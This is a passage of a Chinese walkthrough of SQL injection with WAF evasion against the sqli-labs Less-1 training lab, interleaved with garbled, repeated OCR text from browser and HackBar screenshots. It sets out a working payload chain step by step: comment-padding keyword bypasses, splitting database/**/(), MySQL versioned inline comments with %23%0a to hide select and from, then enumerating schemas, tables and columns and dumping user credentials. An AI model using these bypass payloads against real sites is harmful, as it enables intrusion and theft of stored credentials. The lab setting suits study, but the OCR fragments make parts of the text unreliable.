2. 测试and
直接使用and的时候,没有异常,但是使用and 1=1的时候,出现问题
正常
Welcome
Dhakkan
YANDARERGMYUS款mm心YMoe
曝样式编辑器
存储
口查吞器
网络
调试器
无障碍环境
性第
应用程序
内存
四控制台
AdblockPlus
HackTools
HackBar
Contributenow!
XSS
SQL
Other
Encoding
ncryption'
http://10.211.55.9/ess-/id-
LoADURL
and
--+
SplitURl
拦截
m
目口
10.211.55.9/Less-1/qid-1%20and%201%20
转到下一页
下拉显示历史
网站防火墙
您的请求带有不合法参数,已被网站管理员设置拦截!
可能原因:您提交的内容包含危险的攻击请求
如何解决:
内存日存储可无障碍环境
应用程序
性能
查看器
控制台调试器杯网络样式编辑器
AdblockPlus
HackBar
xSSOther
Encoding
Encryption
SQL
http://10.211.55.9/Less-/id-d
LoadURL
SplitURL
品
这里测试发现 and 可以出现,但是1不可以出现,既然无法绕过,这里尝试使用注释符来进行测试
3. 测试注释符
在这随机手写了一个,然后就过了。。。。
/*@%$^(*/
http://10.211.55.9/Less-1/?id=1' and/*@%$^(*/ 1=1 --+
Dhakkan
Welcome
YourLogin
inname:Dumb
YourPassword:Dumb
日存储
一无障碍环境
样式编辑器
网络
口查看器
控制台
性能
应用程序
0内存
调试器
HackTools
AdblockPlus
HackBar
Encryption
XSS
Other
Encoding
SQL
LoadURL
http://10.211.55.9Le/%/
SplitURL
Dhakkan
Welcome
YourLogin
inname:Dumb
YourPassword:Dumb
日存储
一无障碍环境
样式编辑器
网络
口查看器
控制台
性能
应用程序
0内存
调试器
HackTools
AdblockPlus
HackBar
Encryption
XSS
Other
Encoding
SQL
LoadURL
http://10.211.55.9Le/%/
SplitURL
Dhakkan
Welcome
YourLogin
inname:Dumb
YourPassword:Dumb
日存储
一无障碍环境
样式编辑器
网络
口查看器
控制台
性能
应用程序
0内存
调试器
HackTools
AdblockPlus
HackBar
Encryption
XSS
Other
Encoding
SQL
LoadURL
http://10.211.55.9Le/%/
SplitURL
继续:
使用order by指令
http://10.211.55.9/Less-1/?id=1' order by 4 --+
这里可以测出来一共存在三列,然后使用联合查询来试试
http://10.211.55.9/Less-1/?id=1' union select 1,2,3 --+
10.211.55.9/Less-1/id1%2uonelc12
Bing
网站防火墙
您的请求带有不合法参数,已被网站管理员设置拦截
可能原因:您提交的内容包含危险的攻击请求
如何解决:
中
日存储
调试器此网络样式编辑器
内存
应用程序
查看器
无障碍环境
性能
控制台
AdblockPlus
HacKTo
HackBar
EncodingsQLXSSOther
Encryption
LoadURL
http://10.211.55.9/Less-/iinselc2
品
SplitURL
10.211.55.9/Less-1/id1%2uonelc12
Bing
网站防火墙
您的请求带有不合法参数,已被网站管理员设置拦截
可能原因:您提交的内容包含危险的攻击请求
如何解决:
中
日存储
调试器此网络样式编辑器
内存
应用程序
查看器
无障碍环境
性能
控制台
AdblockPlus
HacKTo
HackBar
EncodingsQLXSSOther
Encryption
LoadURL
http://10.211.55.9/Less-/iinselc2
品
SplitURL
如果只有union呢?试试
http://10.211.55.9/Less-1/?id=1' union --+ 正常
WelcomeDhakkan
YAMeAEAAIUS0XLOMDCORMDBOUMSALBOYBUULAOMAOUGTUALUIG
中查看器
此网络
日存储
调试器
样式编辑器
控制台
AdblockPlus器应用程序
性能
内存
无障碍环境
HackBar
HackTools
Encryption
SQL
xsszOther
Encoding
Cont
LOaDURL
http://10.211.55.9/Less-1/id1union
SplitURL
select呢
http://10.211.55.9/Less-1/?id=1' union select --+
gg
Bing
网站防火墙
您的请求带有不合法参数,已被网站管理员设置拦截!
可能原因:您提交的内容包含危险的攻击请求
如何解决:
茶中
日存储
]样式编辑器
摆你网络
调试器
应用程序
查看器
控制台
无障碍环境
性能
0内存
HackTools
ABPAdblockPlus
HackBar
Encryption
Encoding
Other
XSS
SQL
LoADURL
http://10.211.55.9/Less-/id-1
1unionselect-+
SpltURL
Execute
PostdataORefererOUserAgentoCookies
ClearAll
使用刚刚的注释符试试
http://10.211.55.9/Less-1/?id=1' union /*@%$^(*/ select --+正常
Dhakkan
Welcome
UbeyanGrgYu50mbomeombooma
ne/9_9
内存
日存储
样式编辑器
照应用程序
无障碍环境
介网络
查看器
性能
调试器
控制台
AdblockPlus
HackTools
HackBar
XSS
Encryption
SQL
Other
Encoding
http://10.211.55.9/Less-/iduion/@%$/select
LOadURL
继续
http://10.211.55.9/Less-1/?id=1' union /*@%$^(*/ select 1,2,3 --+显示正常
WelcomeDhakkan
YourLoginname:Dumb
YourPassword:Dumb
日存储
查看器
0内存
性能
无障碍环境
调试器
控制台
仪网络
样式编辑器
应用程序
AdblockPlus
HackBar
Encryption
SQL
XSS
Other
Encoding
http:/10.211.55.9Leio%/l2
LoadURL
SnlitURl
继续:
http://10.211.55.9/Less-1/?id=-1' union /*@%$^(*/ select 1,2,3 --+
正常
Dhakkan
Welcome
YourLoginname:2
YourPassword:3
日存储
[样式编辑器
0内存
此网络
控制台
性能
调试器
查看器
无障碍环境
AdblockPlus
HackBar
ABP
Encoding
Encryption
XSS
SQL
Other
http://10.211.55.9/i2
LoadURL
品
SplitURL
那就可以来获得数据了
http://10.211.55.9/Less-1/?id=-1' union /*@%$^(*/ select 1,2, database() --+
错误
网站防火墙
您的请求带有不合法参数,已被网站管理员设置拦截!
可能原因:您提交的内容包含危险的攻击请求
如何解决:
控制台
此网络
D调试器
性能刀内存
无障碍环境
查看器
样式编辑器
应用程序
AdblockPlus
存储
HackTools
HackBar
Encryption
XSS
SQL
Other
Encoding
LoaDURL
http://10.211.55.9Le-io%l.a
SplitURL
看来database()被过滤,那这里面对其进行绕过
4. 测试database()
在这里经过多次测试之后发现,database()可以使用database/**/()进行绕过
database/**
se1ect
mySq1
database
十
security
十
1
0.00
sec
in
set
row
http://10.211.55.9/Less-1/?id= -1' union /*@%$^(*/ select 1,2, database/**/() --+
显示正常
Dhakkan
Welcome
YourLoginname:2
YourPassword:security
看器
日存储
无障碍环境
此网络
0内存
样式编辑器
调试器
性能
控制台
HackBar
AdblockPlus
Encoding
XSS
SQL
Other
n
http://10.211.559e-/dl
URL
URL
此时已经获得了数据库名称为security
继续操作来进行下一步,直到能够获取所有的关键信息
现在已知数据库之后,开始获取数据库中的表信息:
对第三个位置来获取表信息:
http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表,或者是:http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的
试试:
http://10.211.55.9/Less-1/?id= -1' union /*@%$^(*/ select 1,2, table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1 --+
情理之中,开始准备fuzz
网站防火墙
您的请求带有不合法参数,已被网站管理员设置拦截!
可能原因:您提交的内容包含危险的攻击请求
如何解决:
检查提交内容;
2)如网站托管,请联系空间提供商;
3)普通网站访客,请联系网站管理员;
中查若器口控制台D调试器刊网络样式编据器性能0内存
日存储
一无障碍环境
鲁
暖应用程序
0p
HackTools
AdblockPlus
HackBar
Other
ryptionEncodingSQLXSS
地和选
LoadURL
SplitURL
Execute
http://10.211.55.9/Less-1/?id= -1' union /*@%$^(*/ select 1,2, table_name --+
正常
Dhakkan
Welcome
Unknowncolumn'tablename'in'fieldlist
SQLIDUMBSERO
日存储
D调试器
日控制台
中查看器
样式编辑器
0内存
无障碍环境
性能
杯网络
应用程序
AdblockPlus
HackTools
HackBar
SQL
XSS
Encoding
Other
cryption
LOaDURL
http:/10.211.55.9L-%slt2la
--+
http://10.211.55.9/Less-1/?id= -1' union /*@%$^(*/ select 1,2, table_name from --+
此时显示异常
网站防火墙
您的请求带有不合法参数,已被网站管理员设置拦截!
可能原:您提交的内容包含危险的攻击请求
如何解决:
1)检查提交内容;
2)如网站托管,请联系空间提供商;
3)普通网站访客,请联系网站管理员;
日存储
无障碍环境
霸应用程序
门样式编辑器
0内存
性能
调试器
查君器
日控制台
网络
AdblockPlus
HackTools
HackBar
Other一
XSS
SQL
Encoding
ncryption
LOaDURL
htp//io.211.5592lm
SplitURL
经过fuzz发现,from是关键字,table_name 并不是关键字,所以需要对from进行绕过
经过多次多组fuzz发现,这里需要使用chr()来进行绕过
http://10.211.55.9/Less-1/?id= -1' union /*@%$^(*/ select 1,2, CHAR(102, 114, 111, 109) --+
成功
Dhakkan
Welcome
YourLoginname:2
YourPassword:from
SOLIDUMBSHRO
贝性能
样式编辑器
你网络
日存储
D调试器
无障碍环境
0内存
应用程序
制台
HackTools
HackBar
AdblockPlus
xssOther
SQL
oding
http://10.211.55.9/Less-/?id
1union/@%S/select1.2CHA(102141)
--+
但是在这里是没法继续下去的
内联注释知识点
- /*!select*/: 相当于没有注释
- /*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。
- /*![]*/: []中括号中的数字若填写则必须是5位
mvsqiselect*51000version
54(42000:Youhaveanerror
ERROR1064
SQL
syntax;checkthe
that
in
manual
your
fortherightsyntaxtousen
at
correspondstoyourMySQLseryerersion
enear
iine1
mysqi>select*!41000versionO)*;
version
5,5.53
rowinset(0.00sec
mySq1>select*!49000versionO*;
version(
5,5.53
http://10.211.55.9/Less-1/?id= -1' union /*!00000%23%0aselect*/ 1,2, group_concat(schema_name) /*!00000%23/*%0afrom */ information_schema.schemata --+
Welcome
Dhakkan
YourLoginname:2
YourPasswordinfomionchmangesmspomaem
SQLIDUMDBSERODBS-
熊:应用程序
日存储
0内存
此网络
性能
AdblockPlus
调试器
控制台
无障碍环境
样式编锗器
查吞器
HackBar
HackTools
ContributenowlHackBarv
XSS
SQL
Encoding
yption
Other
啦如地心他
OADURL
/920information_schema.schemata%20%20%20--+
plitURL
Execute
PostdataORefereroUserAgentCcookies
ClearAIl
fuzz成功
这里使用
/*!%23/*%0afrom*/
http://10.211.55.9/Less-1/?id= -1' union /*!00000%23%0aselect*/ 1,2, group_concat(table_name) /*!%23/*%0afrom*/ information_schema.tables where table_schema='security' --+
Dhakkan
Welcome
YourLoginname:2
YourPassword:emails,referers,u,
SQLIDUMBSBROES
吕存储
熊应用程序
样式编辑器
控制台
查看器
O内存
性能
网络
调试器
无障碍环境
AdblockPlus
HackBar
HackTools
Encryption-
Encoding
SQL
XSS
Contributenow!Hao
Other
LoaDURL
脚地
SpltURL
Execute
http://10.211.55.9/Less-1/?id= -1' union /*!00000%23%0aselect*/ 1,2, group_concat(column_name) /*!%23/*%0afrom*/ information_schema.columns where table_name='users' --+
Welcome_Dhakkan
YourLoqinname:2
YourPassword:id,username,password
SQLIDUMBSHROES
中查看器
露应用程序
调试器
此网络
0内存
日存储
无障碍环境
性能
区
伊样式瑜辑器
AdblockPlus
控制台
HackBar
HackTodls
XSS
SQL
Other
ContributenowlHackBarv
encryption
Encoding
千叫@m
LOaDURL
http://10.211.55.9/Less-/2id
SplNtURL
Execute
OPostdata
ClearAII
Cookies
Referer
UserAgent
http://10.211.55.9/Less-1/?id= -1' union /*!00000%23%0aselect*/ 1,2,group_concat(concat_ws(0x7e, username, password)) /*!%23/*%0afrom*/ security.users --+
Dhakkan
welcome
YourLoginname:2
YourPassword:Dumb~Dumb,Angelina-ill-
UDCmYPgGd%YPmmm
SQLIDUMBSEROSS
日存储
门样式编器性能
O内存
可无障碍环境
口控制台
盟应用程序
词试器
查右器
网络
AdblockPlus
HackBar
HackTools
ContributenowlHackBarv2
XSS
SQL
Other
Encoding
Encryptlon
LoaDURL
地却取年叫1
SpltURL
M.
Execute
UserAgentOCookies
Postdata
ClearAIl
Reterer
Dhakkan
welcome
YourLoginname:2
YourPassword:Dumb~Dumb,Angelina-ill-
UDCmYPgGd%YPmmm
SQLIDUMBSEROSS
日存储
门样式编器性能
O内存
可无障碍环境
口控制台
盟应用程序
词试器
查右器
网络
AdblockPlus
HackBar
HackTools
ContributenowlHackBarv2
XSS
SQL
Other
Encoding
Encryptlon
LoaDURL
地却取年叫1
SpltURL
M.
Execute
UserAgentOCookies
Postdata
ClearAIl
Reterer
Dhakkan
welcome
YourLoginname:2
YourPassword:Dumb~Dumb,Angelina-ill-
UDCmYPgGd%YPmmm
SQLIDUMBSEROSS
日存储
门样式编器性能
O内存
可无障碍环境
口控制台
盟应用程序
词试器
查右器
网络
AdblockPlus
HackBar
HackTools
ContributenowlHackBarv2
XSS
SQL
Other
Encoding
Encryptlon
LoaDURL
地却取年叫1
SpltURL
M.
Execute
UserAgentOCookies
Postdata
ClearAIl
Reterer
tamper编写
后面出视频
